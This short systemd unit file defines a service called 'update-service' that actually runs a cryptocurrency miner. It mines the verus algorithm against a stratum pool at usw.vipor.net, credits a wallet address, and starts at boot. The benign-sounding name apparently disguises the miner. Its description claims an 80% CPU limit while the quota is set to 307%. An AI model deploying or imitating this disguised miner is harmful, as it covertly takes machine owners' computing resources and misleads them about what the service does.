[Unit]
Description=update-service with 80% CPU Limit

[Service]
ExecStart=/root/update-service/update-service -a verus -o stratum+tcp://usw.vipor.net:5040 -u RBufqygvWTYxnk1tHn1uaDt8onzjTuBJSb.OCIUS001 -p x --cpu-priority 2 -t 4
CPUQuota=307%

[Install]
WantedBy=multi-user.target
